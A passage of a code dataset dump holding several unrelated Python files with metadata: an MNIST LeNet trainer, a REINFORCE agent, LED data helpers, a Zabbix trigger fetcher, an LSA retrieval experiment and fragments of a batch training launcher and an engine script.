datetime.datetime.now()\n path = args.destination+str(i.year)+\"-\"+str(i.month)+\"-\"+str(i.day)+\"-\"+folder\n if not os.path.exists(path):\n os.makedirs(path)\n for f in os.listdir(pathSrc+\"/\"+folder):\n with open(pathSrc+\"/\"+folder+\"/\"+f, 'r') as d :\n data = json.load(d)\n pathDest = path + \"/\"+f[:-5]\n subprocess.call(create_chpt_cmd(args, pathDest), shell = True)\n subprocess.call(create_cmd(data, pathDest), shell = True)\n subprocess.call((\"touch \"+pathDest+\"/checkpoints_saved/STOP\"), shell = True)\n\n\ndef get_arg_parser():\n parser = argparse.ArgumentParser()\n parser.add_argument('-f', default='toTrain', type=str,\n help='Folder where to find the JSON files with the training options', dest='folder')\n parser.add_argument('-t', default=1800, type=int,\n help='Period of time btw checkpoints save', dest='time')\n parser.add_argument('-d', default='logs/', type=str,\n help='Folder where to save the training information', dest='destination')\n return parser\n\nif __name__ == '__main__':\n args = get_arg_parser().parse_args()\n main(args)\n", "sub_path": "scripts/batchTrain.py", "file_name": "batchTrain.py", "file_ext": "py", "file_size_in_byte": 3306, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "os.listdir", "line_number": 48, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 49, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 49, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path", "line_number": 51, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 52, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 53, "usage_type": "call"}, {"api_name": "json.load", "line_number": 55, "usage_type": "call"}, {"api_name": "subprocess.call", "line_number": 57, "usage_type": "call"}, {"api_name": "subprocess.call", "line_number": 58, "usage_type": "call"}, {"api_name": "subprocess.call", "line_number": 59, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 63, "usage_type": "call"}]} +{"seq_id": "462920404", "text": "#%%\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as functional\nimport torch.optim as optim\nfrom torchvision import datasets, transforms\nimport torchvision\nfrom torch.autograd import Variable\nfrom torch.utils.data import DataLoader\nimport cv2\n\nbatch_size = 100\n#%%\n# train dataset\ntrain_dataset = datasets.MNIST(root='./num/',\n train=True,\n transform=transforms.ToTensor(),\n download=True)\n# test dataset\ntest_dataset = datasets.MNIST(root='./num/',\n train=False,\n transform=transforms.ToTensor(),\n download=True)\n\n#%%\n# Dataset to load dataset name\n# Batch_size to set image number\n# In the loading the dataset will be shuffle and be packed\n\n# Load the train_dataset\ntrain_loader = torch.utils.data.DataLoader(dataset=train_dataset,\n batch_size=batch_size,\n shuffle=True)\n# Load the test_dataset\ntest_loader = torch.utils.data.DataLoader(dataset=test_dataset,\n batch_size=batch_size,\n shuffle=True)\n\n# Build a dataLoader\ntrain_loader = torch.utils.data.DataLoader(dataset=train_dataset,\n batch_size=batch_size,\n shuffle=True)\ntest_loader = torch.utils.data.DataLoader(dataset=test_dataset,\n batch_size=batch_size,\n shuffle=True)\n\n\n#%% Make the single image visual\nimages, labels = next(iter(train_loader))\nimg = torchvision.utils.make_grid(images)\n\nimg = img.numpy().transpose(1, 2, 0)\nstd = [0.5, 0.5, 0.5]\nmean = [0.5, 0.5, 0.5]\nimg = img * std + mean\nprint(labels)\ncv2.imshow('win', img)\nkey_pressed = cv2.waitKey(0)\n\n#%%\n# Convolution layer use torch.nn.Conv2d\n# Activating layer use torch.nn.ReLU\n# Pooling layer use torch.nn.MaxPool2d\n# Max_connection layer use torch.nn.Linear\n\nclass LeNet(nn.Module):\n def __init__(self):\n super(LeNet, self).__init__()\n self.conv1 = nn.Sequential(nn.Conv2d(1, 6, 3, 1, 2), nn.ReLU(),\n nn.MaxPool2d(2, 2))\n\n self.conv2 = nn.Sequential(nn.Conv2d(6, 16, 5), nn.ReLU(),\n nn.MaxPool2d(2, 2))\n\n self.fc1 = nn.Sequential(nn.Linear(16 * 5 * 5, 120),\n nn.BatchNorm1d(120), nn.ReLU())\n\n self.fc2 = nn.Sequential(\n nn.Linear(120, 84),\n nn.BatchNorm1d(84),\n nn.ReLU(),\n nn.Linear(84, 10)) # the 10 is because of the label between 0-9\n\n def forward(self, x):\n x = self.conv1(x)\n x = self.conv2(x)\n x = x.view(x.size()[0], -1)\n x = self.fc1(x)\n x = self.fc2(x)\n return x\n\n#%%\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nbatch_size = 64\nLR = 0.001\n\nnet = LeNet().to(device)\n# Loss function use the cross entropy loss\ncriterion = nn.CrossEntropyLoss()\n# optimizer use the adam adaptive optimization algorithm\noptimizer = optim.Adam(net.parameters(), lr=LR,)\n\nepoch = 1\nif __name__ == '__main__':\n for epoch in range(epoch):\n sum_loss = 0.0\n for i, data in enumerate(train_loader):\n inputs, labels = data\n inputs, labels = Variable(inputs).cuda(), Variable(labels).cuda()\n optimizer.zero_grad() # Make the gradient to zero\n outputs = net(inputs) # Make the data into the net and forward\n loss = criterion(outputs, labels) # Get the loss function\n loss.backward() # backward broadcast\n optimizer.step() # update the para by the gradient\n\n # print(loss)\n sum_loss += loss.item()\n if i % 100 == 99:\n print('[%d,%d] loss:%.03f' %\n (epoch + 1, i + 1, sum_loss / 100))\n sum_loss = 0.0\n\n#%% Test model\nnet.eval()\ncorrect = 0\ntotal = 0\nfor data_test in test_loader:\n images, labels = data_test\n images, labels = Variable(images).cuda(), Variable(labels).cuda()\n output_test = net(images)\n _, predicted = torch.max(output_test, 1)\n total += labels.size(0)\n correct += (predicted == labels).sum()\nprint(\"correct1: \", correct)\nprint(\"Test acc: {0}\".format(correct.item() / len(test_dataset)))\n\n", "sub_path": "train_mnist.py", "file_name": "train_mnist.py", "file_ext": "py", "file_size_in_byte": 4492, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "torchvision.datasets.MNIST", "line_number": 15, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 15, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 17, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 17, "usage_type": "name"}, {"api_name": "torchvision.datasets.MNIST", "line_number": 20, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 20, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 22, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 22, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 31, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 35, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 40, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.utils", "line_number": 43, "usage_type": "attribute"}, {"api_name": "torchvision.utils.make_grid", "line_number": 50, "usage_type": "call"}, {"api_name": "torchvision.utils", "line_number": 50, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 57, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 58, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 66, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 66, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 69, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.nn.ReLU", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 70, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 72, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.nn.ReLU", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.nn.MaxPool2d", "line_number": 73, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 73, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 75, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 75, "usage_type": "call"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 76, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 76, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 76, "usage_type": "call"}, {"api_name": "torch.nn.Sequential", "line_number": 78, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 78, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 79, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 79, "usage_type": "name"}, {"api_name": "torch.nn.BatchNorm1d", "line_number": 80, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 80, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 81, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 81, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 82, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 82, "usage_type": "name"}, {"api_name": "torch.device", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 93, "usage_type": "attribute"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 99, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 99, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 101, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 101, "usage_type": "name"}, {"api_name": "torch.autograd.Variable", "line_number": 109, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 129, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 131, "usage_type": "call"}]} +{"seq_id": "315667420", "text": "\n# coding: utf-8\n\n# In[2]:\n\nimport numpy as np\nimport csv\nimport time\n#import matplotlib\n#import matplotlib.pyplot as plt\nimport datetime\n#import pandas as pd\nfrom LEDsetup import *\n\n\n# ### Open datafiles\n\n# In[31]:\n\ndef OpenDailyData(filename):\n time_stamp = []\n value = []\n with open(filename) as f:\n cf = csv.DictReader(f, fieldnames=['time_stamp', 'value'])\n for row in cf:\n try:\n time_stamp.append(datetime.datetime.strptime(row['time_stamp'], \"%Y-%m-%d\"))\n \n except:\n time_stamp.append(datetime.datetime.strptime(row['time_stamp'], \"%Y-%m-%d %H:%M:%S\"))\n value.append(float(row['value']))\n \n \n return(time_stamp, value)\n\n\n# In[ ]:\n\ndef OpenMonthlyData(filename):\n month = []\n year = []\n value = []\n with open(filename) as f:\n cf = csv.DictReader(f, fieldnames=['month','year', 'value'])\n for row in cf:\n #print(row)\n month.append(row['month'])\n year.append(row['year'])\n value.append(float(row['value']))\n \n \n return(month, year, value)\n\n\n# ### Generating color scale\n\n# In[19]:\n\n#def ColorScale(steps, color1, color2):\n #clrs = []\n #inc = 1/(steps-1)\n #print(inc)\n \n #for i in range(steps):\n #new_color = (int(color1[0]*i*inc+color2[0]*(steps-i-1)*inc),\n #int(color1[1]*i*inc+color2[1]*(steps-i-1)*inc), \n #int(color1[2]*i*inc+color2[2]*(steps-i-1)*inc))\n #print(new_color)\n #clrs.append(new_color)\n\n \n #return clrs\n\n\n\n# In[22]:\n\ndef ColorScaler(color_low, color_high, value, min_value = 0, max_value = 0):\n if((min_value == 0) & (max_value == 0)):\n min_value = min(value)\n max_value = max(value)\n clr_data = []\n \n for val in value:\n ratio = (val - min_value)/(max_value-min_value)\n new_color = (int(color_high[0]*ratio+color_low[0]*(1-ratio)),\n int(color_high[1]*ratio+color_low[1]*(1-ratio)), \n int(color_high[2]*ratio+color_low[2]*(1-ratio)))\n #print(new_color)\n clr_data.append(new_color)\n \n return clr_data\n\n\n# In[26]:\n\ndef NumScaler(led1, led2, value, min_value = 0, max_value = 0):\n if((min_value == 0) & (max_value == 0)):\n min_value = min(value)\n max_value = max(value)\n \n num_data = []\n \n for val in value:\n ratio = (val - min_value)/(max_value-min_value)\n new_num = led1 + int((led2-led1)*ratio)\n num_data.append(new_num)\n\n \n return num_data\n\n\n# In[28]:\n\ndef Flash(num_flashes, delay, color, led1 = 0, led2 = 79):\n for i in range(num_flashes):\n led.fill(color, led1, led2)\n led.update()\n time.sleep(delay)\n led.fill((0,0,0), led1, led2)\n led.update()\n time.sleep(delay)\n\n\n\n# In[ ]:\n\ndef Pulse(num_pulses, color, led1 = 0, led2 = 79):\n ## Step-up intensity by 10% increments, then step down by the same every 0.1 seconds. total time = 2 sec\n \n intensity = np.arange(0,1.1,0.1) \n\n for i in intensity:\n color_new = (int(color[0]*i),int(color[1]*i),int(color[2]*i)) \n # There is probably a more elegant way to do this.. \n #print color_new\n led.fill(color_new, led1, led2)\n led.update()\n time.sleep(0.1)\n\n for i in reversed(intensity):\n color_new = (int(color[0]*i),int(color[1]*i),int(color[2]*i)) \n #print color_new\n led.fill(color_new, led1, led2)\n led.update()\n time.sleep(0.1) \n\n", "sub_path": "DunnePilot/DataFunctions.py", "file_name": "DataFunctions.py", "file_ext": "py", "file_size_in_byte": 3612, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "csv.DictReader", "line_number": 24, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 27, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 27, "usage_type": "attribute"}, {"api_name": "datetime.datetime.strptime", "line_number": 30, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 30, "usage_type": "attribute"}, {"api_name": "csv.DictReader", "line_number": 44, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 119, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 131, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 139, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 146, "usage_type": "call"}]} +{"seq_id": "10027459", "text": "import os\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\nimport numpy as np\nfrom gym import logger\nfrom .utils import plot_figure, check_reward, discount_reward, weight_init\n\n\nclass PGNet(nn.Module):\n def __init__(self, input_dims, fc1_dims, fc2_dims, n_actions):\n super(PGNet, self).__init__()\n self.fc1 = nn.Linear(input_dims, fc1_dims)\n self.fc2 = nn.Linear(fc1_dims, fc2_dims)\n self.fc3 = nn.Linear(fc2_dims, n_actions)\n\n def forward(self, observation):\n x = F.relu(self.fc1(observation))\n x = F.relu(self.fc2(x))\n out = self.fc3(x)\n return out\n\n\nclass PGAgent(object):\n def __init__(self, lr, input_dims, n_actions, env_name,\n ckpt_save_path, gamma=0.99, fc1_dims=128, fc2_dims=256):\n self.reward_memory = []\n self.action_memory = []\n self.score_history = [] # episode history for plot\n self.gamma = gamma # discount factor\n self.cur_episode = 0\n self.env_name = env_name\n self.agent_name = f\"PG_{env_name}\"\n self.ckpt_save_path = ckpt_save_path\n self.actor = PGNet(input_dims, fc1_dims, fc2_dims, n_actions)\n self.actor.apply(weight_init)\n self.optimizer = optim.Adam(self.actor.parameters(), lr=lr)\n self.device = torch.device(\n 'cuda:0' if torch.cuda.is_available() else 'cpu')\n self.actor.to(self.device)\n\n def __str__(self):\n return self.agent_name\n\n def predict(self, observation):\n x = torch.Tensor(observation).to(self.device)\n probabilities = F.softmax(self.actor.forward(x), dim=-1)\n action_probs = torch.distributions.Categorical(probabilities)\n action = action_probs.sample()\n log_probs = action_probs.log_prob(action)\n self.action_memory.append(log_probs)\n\n return action.item()\n\n def store_rewards(self, reward):\n self.reward_memory.append(reward)\n\n def choose_action(self, observation):\n x = torch.Tensor(observation).to(self.device)\n _, action = torch.max(self.actor.forward(x), dim=-1)\n return action.item()\n\n def clear_memory(self):\n self.action_memory = []\n self.reward_memory = []\n\n def save_model(self, path, episode):\n torch.save({\n 'model_state_dict': self.actor.state_dict(),\n 'optimizer_state_dict': self.optimizer.state_dict(),\n 'cur_episode': episode\n }, path)\n\n def load_model(self, path, test=False):\n checkpoint = torch.load(path)\n self.actor.load_state_dict(checkpoint['model_state_dict'])\n self.optimizer.load_state_dict(\n checkpoint['optimizer_state_dict'])\n self.cur_episode = checkpoint['cur_episode']\n if test:\n self.actor.eval()\n else:\n self.actor.train()\n\n def learn(self):\n self.optimizer.zero_grad()\n\n # Calcualte discount reward G[]\n G = discount_reward(self.reward_memory, self.gamma)\n\n # Normalize\n mean = np.mean(G)\n std = np.std(G) if np.std(G) > 0 else 1\n G = (G - mean) / std\n\n loss = 0\n for g, logprob in zip(G, self.action_memory):\n loss += -g * logprob\n\n loss.backward()\n self.optimizer.step()\n\n self.clear_memory()\n\n def train(self, env, episodes):\n max_score = -514229\n total_step = 0\n for eps in range(self.cur_episode, episodes):\n state = env.reset()\n score = 0\n done = False\n episode_step = 0\n while not done:\n action = self.predict(state)\n state_, reward, done, _ = env.step(action)\n episode_step += 1\n total_step += 1\n score += reward\n reward = check_reward(\n self.env_name, state, action, reward, state_, done\n )\n self.store_rewards(reward)\n state = state_\n\n self.score_history.append(score)\n max_score = score if score > max_score else max_score\n if score > -1.0 * episode_step:\n self.learn()\n logger.info(\n f\" == episode: {eps+1}, score: {score}, max score: {max_score}\")\n else:\n self.clear_memory()\n\n if (eps + 1) % 100 == 0:\n ckpt_name = os.path.join(\n self.ckpt_save_path, f\"ckpt_{eps}.pth\")\n self.save_model(ckpt_name, eps)\n logger.info(f\" == model {ckpt_name} saved\")\n\n ckpt_name = os.path.join(self.ckpt_save_path, \"ckpt_final.pth\")\n self.save_model(ckpt_name, eps)\n logger.info(f\" == model {ckpt_name} saved\")\n figure_name = os.path.join(\n self.ckpt_save_path, f\"{self.agent_name}.png\")\n plot_figure(figure_name, self.score_history)\n", "sub_path": "models/reinforce.py", "file_name": "reinforce.py", "file_ext": "py", "file_size_in_byte": 4950, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "torch.nn.Module", "line_number": 11, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 11, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 14, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 14, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 15, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 16, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 19, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 20, "usage_type": "name"}, {"api_name": "utils.weight_init", "line_number": 37, "usage_type": "argument"}, {"api_name": "torch.optim.Adam", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 38, "usage_type": "name"}, {"api_name": "torch.device", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 40, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 47, "usage_type": "call"}, {"api_name": "torch.nn.functional.softmax", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 48, "usage_type": "name"}, {"api_name": "torch.distributions.Categorical", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.distributions", "line_number": 49, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 61, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 69, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 76, "usage_type": "call"}, {"api_name": "utils.discount_reward", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 94, "usage_type": "call"}, {"api_name": "utils.check_reward", "line_number": 120, "usage_type": "call"}, {"api_name": "gym.logger.info", "line_number": 130, "usage_type": "call"}, {"api_name": "gym.logger", "line_number": 130, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 136, "usage_type": "call"}, {"api_name": "os.path", "line_number": 136, "usage_type": "attribute"}, {"api_name": "gym.logger.info", "line_number": 139, "usage_type": "call"}, {"api_name": "gym.logger", "line_number": 139, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 141, "usage_type": "call"}, {"api_name": "os.path", "line_number": 141, "usage_type": "attribute"}, {"api_name": "gym.logger.info", "line_number": 143, "usage_type": "call"}, {"api_name": "gym.logger", "line_number": 143, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 144, "usage_type": "call"}, {"api_name": "os.path", "line_number": 144, "usage_type": "attribute"}, {"api_name": "utils.plot_figure", "line_number": 146, "usage_type": "call"}]} +{"seq_id": "75330779", "text": "# __author__: wang_chongsheng\n# date: 2017/10/26 0026\n# --encoding=utf-8\nfrom pyzabbix import ZabbixAPI\n\n\n###pyzabbix\nclass pyzabbixAPI(object):\n def __init__(self):\n self.prioritytostr = {'0': 'ok', '1': '信息', '2': '警告', '3': '严重'} # 告警级别\n\n def login(self):\n '''''\n 进行认证\n 返回 api 接口\n '''\n zapi = ZabbixAPI('http://zabbixdomain.com')\n zapi.login('user', 'pwd')\n return zapi\n\n def getCurIssue(self, zapi):\n '''''\n 获取所有最近有问题的trigger\n 返回trigger的信息列表: ['trigger1','trigger2',......]\n '''\n triggers = zapi.trigger.get(\n only_true=1,\n skipDependent=1,\n monitored=1,\n active=1,\n output='extend',\n expandDescription=1,\n selectHosts=['host'],\n )\n\n # 获取未确认的trigger\n unack_triggers = zapi.trigger.get(\n only_true=1,\n skipDependent=1,\n monitored=1,\n active=1,\n output='extend',\n expandDescription=1,\n selectHosts=['host'],\n withLastEventUnacknowledged=1,\n )\n unack_trigger_ids = [t['triggerid'] for t in unack_triggers]\n for t in triggers:\n t['unacknowledged'] = True if t['triggerid'] in unack_trigger_ids else False\n\n # 每个trigger信息格式 :[时间] 级别:ip - 详情 是否确认\n triggerlist = []\n for t in triggers:\n if int(t['value']) == 1:\n triggerlist.append(\"[{0}] {1} : {2}({3}) - {4} {5}\".format(\n time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime(float(t['lastchange']))),\n self.prioritytostr[t['priority']],\n t['hosts'][0]['host'],\n self.getHostgroupName(zapi, t['hosts'][0]['host']),\n t['description'],\n '(Unack)' if t['unacknowledged'] else ''\n )\n )\n return triggerlist\n\n def getHostgroupName(self, zapi, hostname):\n '''''\n 通过hostname(即ip)获取host所在的监控组名\n 返回由组名组成的字符串\n '''\n groups = zapi.host.get(\n search={\"name\": hostname},\n selectGroups=['name'],\n output=['groups']\n )[0]['groups']\n groupname = [group['name'] for group in groups]\n return ' '.join(groupname)", "sub_path": "zabbix/trigger.py", "file_name": "trigger.py", "file_ext": "py", "file_size_in_byte": 2515, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pyzabbix.ZabbixAPI", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "140820866", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[115]:\n\n\nfrom nltk.corpus import reuters \nfrom nltk import word_tokenize\nfrom nltk.stem.porter import PorterStemmer\nimport re\nfrom nltk.corpus import stopwords\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\n# In[116]:\n\n\nstopwordsList = stopwords.words(\"english\")\ndef tokenize(text):\n min_length = 3\n words = map(lambda word: word.lower(), word_tokenize(text));\n words = [word for word in words if word not in stopwordsList]\n tokens =(list(map(lambda token: PorterStemmer().stem(token), words)));\n p = re.compile('[a-zA-Z]+');\n filtered_tokens = list(filter(lambda token: p.match(token) and len(token)>=min_length, tokens));\n return filtered_tokens\n\n\n# In[117]:\n\n\ndef tf_idf(docs):\n tfidfVectorizer = TfidfVectorizer(tokenizer=tokenize, use_idf=True, sublinear_tf=True);\n matrix = tfidfVectorizer.fit_transform(docs);\n return tfidfVectorizer, matrix;\n\n\n# In[118]:\n\n\ndef transform_query(query, tfidfVectorizer):\n query_trans = tfidfVectorizer.transform([query])\n return query_trans\n\n\n# In[119]:\n\n\ndef train_test_reuiter_data():\n train_doc = []\n test_doc = []\n \n for doc_id in reuters.fileids():\n if doc_id.startswith(\"training\"):\n train_doc.append(reuters.raw(doc_id))\n else:\n test_doc.append(reuters.raw(doc_id))\n sliceObject = slice(5)\n train_doc = train_doc[sliceObject]\n test_doc = test_doc[sliceObject]\n # print('***********************************')\n # print(train_doc)\n #print('***********************************')\n # print(test_doc)\n return train_doc, test_doc\n\n\n# In[120]:\n\n\ndef load_Adi_dataset():\n with open('ADI.ALL') as f:\n temp = []\n for l in f:\n temp.append(l.replace('\\n',' '))\n training = ''.join(temp).replace('.T','').split('.I')\n with open('ADI.QRY') as f:\n temp = []\n for l in f:\n temp.append(l.replace('\\n',' '))\n testing = ''.join(temp).replace('.W','').split('.I')\n del training[0]\n del testing[0]\n \n return training,testing;\n\n\n# In[121]:\n\n\ntrain_doc,test_doc = load_Adi_dataset()\ndef get_Rel_doc(query, k):\n tfidfVectorizer, tfidfmatrix = tf_idf(train_doc)\n tfidfmatrix = (tfidfmatrix.toarray()).T\n u,s,v = np.linalg.svd(tfidfmatrix)\n# print(u)\n# print(s)\n# print(v)\n# input()\n\n uk = u[:,0:k]\n sk = np.diag(s[0:k])\n vk = v[0:k,:]\n print(uk)\n print(sk)\n print(vk)\n print(query)\n input()\n quertT = transform_query(query,tfidfVectorizer).toarray()\n# print(quertT)\n# print(np.dot(query, uk))\n# print(np.linalg.inv(sk))\n queryK = np.dot(np.dot(query, uk), np.linalg.inv(sk))\n \n score = np.dot(queryK, vk)[0] #0the index because it is returning 2d type\n sorted_doc = sorted(range(len(score)), key=lambda k: score[k], reverse = True)\n sorted_doc = [n+1 for n in sorted_doc]\n return sorted_doc\n\n\n# In[122]:\n\n\ndef load_actual_doc(queryFile):\n actual_rel_doc = []\n with open('ADI.REL') as f:\n for l in f:\n temp = l.split()\n if int(temp[0]) == queryFile:\n actual_rel_doc.append(int(temp[1]))\n print(actual_rel_doc)\n return actual_rel_doc\n\n\n# In[123]:\n\n\ndef getPrecision(k):\n totalPrecison = 0\n for query_no in range(5):\n actual_rel_docs = load_actual_doc(query_no+1)\n \n predicted_rel_docs = get_Rel_doc(test_docs[query_no], k)\n #print(len(predicted_rel_docs))\n \n print(get_Rel_doc(test_docs[query_no], k))\n count = 0\n for doc_no in actual_rel_docs:\n if predicted_rel_docs.index(doc_no) < len(actual_rel_docs):\n count += 1\n totalPrecison +=count/len(actual_rel_docs)\n print('For K = {} average Precison is {}'.format(k,totalPrecison/5))\n return totalPrecison/5\n \nX = list(range(0, len(train_docs), 5)) \nY = list(map(getPrecision,X))\n\n\nY = [i*100 for i in Y]\nplt.plot(X, Y)\n\n\n# In[ ]:\n\n\n\n\n", "sub_path": "Q1.py", "file_name": "Q1.py", "file_ext": "py", "file_size_in_byte": 4054, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "nltk.corpus.stopwords.words", "line_number": 20, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 20, "usage_type": "name"}, {"api_name": "nltk.word_tokenize", "line_number": 23, "usage_type": "call"}, {"api_name": "nltk.stem.porter.PorterStemmer", "line_number": 25, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 26, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.TfidfVectorizer", "line_number": 35, "usage_type": "call"}, {"api_name": "nltk.corpus.reuters.fileids", "line_number": 55, "usage_type": "call"}, {"api_name": "nltk.corpus.reuters", "line_number": 55, "usage_type": "name"}, {"api_name": "nltk.corpus.reuters.raw", "line_number": 57, "usage_type": "call"}, {"api_name": "nltk.corpus.reuters", "line_number": 57, "usage_type": "name"}, {"api_name": "nltk.corpus.reuters.raw", "line_number": 59, "usage_type": "call"}, {"api_name": "nltk.corpus.reuters", "line_number": 59, "usage_type": "name"}, {"api_name": "numpy.linalg.svd", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 97, "usage_type": "attribute"}, {"api_name": "numpy.diag", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.linalg.inv", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 115, "usage_type": "attribute"}, {"api_name": "numpy.dot", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 162, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 162, "usage_type": "name"}]} +{"seq_id": "588521739", "text": "import numpy as np\nfrom scipy import signal, optimize\nimport tables\n\nfrom engine_parameters import *\n\nprint('load pyplot')\n\nimport matplotlib\nmatplotlib.use('Qt5Agg')\nimport matplotlib.pyplot as plt\n\nprint('done loading pyplot')\n\n# from intake\n# def save(self):\n# angle = 